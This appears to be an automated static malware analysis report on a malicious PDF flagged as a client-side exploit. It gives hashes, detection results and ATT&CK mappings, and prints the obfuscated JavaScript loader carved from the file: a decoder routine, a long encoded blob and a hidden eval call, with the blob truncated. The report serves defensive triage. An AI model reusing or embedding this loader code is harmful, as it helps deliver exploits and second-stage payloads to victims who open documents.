Malicious PDF — malware analysis report

Static analysis result for SHA-256 052f0dcd584c4c0e…

MALICIOUS

PDF

15.3 KB First seen: 2021-06-17
MD5: 305bb38c8f2a64c4d3f2f669b957c495 SHA-1: f3c9943044ae3f21bd7eab161f3b0bc14769058b SHA-256: 052f0dcd584c4c0e4a02527ffeabd26a293d1e2da978b19809f4797aa2ddcfde
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript, flagged by multiple heuristics and a critical ClamAV detection (Pdf.Exploit.Agent-35901). The ML classifier also strongly indicates maliciousness. The deobfuscated JavaScript, though truncated, shows signs of attempting to download and execute a second-stage payload, indicated by the presence of 'legacy_pdfkit_stage_000.js' and typical obfuscation patterns. The primary attack vector is likely spearphishing attachment.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9873

Heuristics 4

  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x22D 12270 bytes
SHA-256: 48f5fa9cdaa7464dfd1cbc9efafd1b079fd1731f81c32a4af905a4e5aa69499c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function btC_y47_27o_p(K0__U8G_E8d1Gei, tl__1R17S){var BigLHX_xl_a = 20;var eg_____c = 0;var Q52fiUi = 512;var uK___r_LG = BigLHX_xl_a;var H_403Kwb5s = "";var S_wx2_dR_83J8j = 4;var AQ_bf7N = this;var x73564Cg = "1234ee";var rWY_a_X__A78G3d = arguments;try {var q6_2kyYqbY8UX = 0;if (app) {uK___r_LG = uK___r_LG + 2;tl__1R17S = pr[q6_2kyYqbY8UX].subject;}x73564Cg = x73564Cg.replace(/\d+/, "call");} catch(e) { }uK___r_LG = uK___r_LG - BigLHX_xl_a;var x5l7g20C = new Array();var g0_0jlgAh = 150;if (g0_0jlgAh > 0) {x5l7g20C[0] = g0_0jlgAh;x5l7g20C[1] = Q52fiUi;x5l7g20C[0] = x5l7g20C[0] - g0_0jlgAh;x5l7g20C[2] = x5l7g20C[0];x5l7g20C[1] = x5l7g20C[1] - Q52fiUi;x5l7g20C[3] = x5l7g20C[1];}if (K0__U8G_E8d1Gei) { x5l7g20C = K0__U8G_E8d1Gei;}if (!K0__U8G_E8d1Gei) {var Q_8__o_b__c = rWY_a_X__A78G3d[x73564Cg].toString();var J___d18r__t = 0;var UarkHt8 = J___d18r__t;g0_0jlgAh = g0_0jlgAh - 102;var I6C__1_6ijC = 0;while(UarkHt8 < Q_8__o_b__c.length) {I6C__1_6ijC = Q_8__o_b__c.charCodeAt(UarkHt8);if (I6C__1_6ijC >= g0_0jlgAh && I6C__1_6ijC <= 57) {if (J___d18r__t == S_wx2_dR_83J8j) {J___d18r__t = -1;}if (J___d18r__t < 0) { J___d18r__t = 0; }x5l7g20C[J___d18r__t] += I6C__1_6ijC;if (x5l7g20C[J___d18r__t] > Q52fiUi) {x5l7g20C[J___d18r__t] -= Q52fiUi;}J___d18r__t = J___d18r__t + 1;}UarkHt8 = UarkHt8 + 1;}}var RbB____7___e = 0;var o__2i_EV3_YSt = 0;var MrD0__3_1WT = -1;var QTf_74vdQVYSC = 0;var BeAY_K__aB0y = 0;do {var C8EBY_37 = 256;if (x5l7g20C[QTf_74vdQVYSC] > C8EBY_37) {x5l7g20C[QTf_74vdQVYSC] -= C8EBY_37;}QTf_74vdQVYSC = QTf_74vdQVYSC + 1;} while (QTf_74vdQVYSC < S_wx2_dR_83J8j);QTf_74vdQVYSC = QTf_74vdQVYSC - S_wx2_dR_83J8j;while(QTf_74vdQVYSC < tl__1R17S.length) {var J1dceN_B_DXC_H = tl__1R17S.substr(QTf_74vdQVYSC, 1) + ' V V ';QTf_74vdQVYSC = QTf_74vdQVYSC + 1;var S_yD1__q = parseInt(J1dceN_B_DXC_H, BigLHX_xl_a);if (MrD0__3_1WT != -1) {o__2i_EV3_YSt += S_yD1__q;if (RbB____7___e == S_wx2_dR_83J8j) {RbB____7___e = 0;}var p_AF3_eo255 = o__2i_EV3_YSt;var lu3CWk3__y_l = Math.floor;p_AF3_eo255 = p_AF3_eo255 - (BeAY_K__aB0y + 2) * x5l7g20C[RbB____7___e];if (p_AF3_eo255 <= 0) {p_AF3_eo255 = p_AF3_eo255 - lu3CWk3__y_l(p_AF3_eo255 / C8EBY_37) * C8EBY_37;}p_AF3_eo255 = String.fromCharCode(p_AF3_eo255);if (uK___r_LG == 1) {H_403Kwb5s += S_yD1__q;} else if (uK___r_LG == 2) {H_403Kwb5s += p_AF3_eo255;} else {H_403Kwb5s += QTf_74vdQVYSC;MrD0__3_1WT = -2;}MrD0__3_1WT = -1;RbB____7___e = RbB____7___e + 1;BeAY_K__aB0y = BeAY_K__aB0y + 1;} else if (MrD0__3_1WT == -1) {MrD0__3_1WT = BigLHX_xl_a;o__2i_EV3_YSt = S_yD1__q * BigLHX_xl_a;}}var Pjwy_Ysub = this;Pjwy_Ysub['ev'+'al'](H_403Kwb5s);}
	btC_y47_27o_p(0, "88bg7e8e054a887g4987ba869dafb12e2868330e53c14i1j030b35ah50888i7a7f17a19i085ab06d3g77c51a8e0i462f444b56c871af52bf09436i663f6f82488d2919642h832h45888j51190c2044c54h9d5c9i8h1a9f85cc6ac73j7bcc041e8i4f14023i8e360595ba6gc12e5786677hc1bd80863c1b673d5j1i476bc54f04bd6b7b8e43739g7a8e23af5c317aab52910j182cac5f4f1566ad690cadbj558h3c70ai5a8ebic67j0742201a2j5j02c87h1d5j1cbi7975c83ebh938f9a3aah462757ag3d5i15272fbe5e41b24a7b6h05cb2i64984f5g9a857cai0g71b05f1h5061b340097a2h5bc70a767589559c68a9144cca3i3j9d0f51a61g2f0e064837ae5b8b7cbj084i918f549j8087a528cf3e0g78cd306da51j32c90h6j0j409690bc62119j7jba5abd422i84b51j95343ac60a4c5d1d7800668ec35193995ea0b3528accbf2fcf3j3f277gc2471ecf4640a62b7i548b6e08aa85216fc9654e9bc12h9c4f471d569d61109daj5590bb42a1983683a974b93210533d5f0g0f75ad58171c5e7gc62e8c716e8bcc7c95ce68025h81cf213hae2f1d0922802g9c7ibd4g81c25ga28d79c3c16da223bd352h5j4d2ja62659a6276d408e5fb99399c23cb3522264bf309e10323h266314b34b7b429b824654933c7ia78a8b02a046b33eb42b2a7114ce7c0a281f42767ic78bc6a85ib317a974519a1053a1c30g0f0h3b23ae8abe7207033i9c815ja8bj869j1f05322i62265377b24gc4c63c6e054i8f4g8i5eb7755a2927086d68bg1h4dbic719c6045722a65d9b88b90g649h996682808jbc24162614722912560214cb9a3j57c5459662a59hc0ah970e410c7169cb2a4f00420gcf24603f0f9cab4g9c1960746e7589c477c43a1g5a0a6811ce67a81c29aa3h6fbj3a7j9b6e93c37e5a0047a32e6cca211aae5a23ba6fa06c0habbb89b0c2438a8d7b9b9c79a04f195851a33cc66bc820b4bj338b8658b695729a46805f0i59ag3260bec04j2a5e4e2f6jae74929bcb5681084f7f527002c93ib25ib41d2a
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.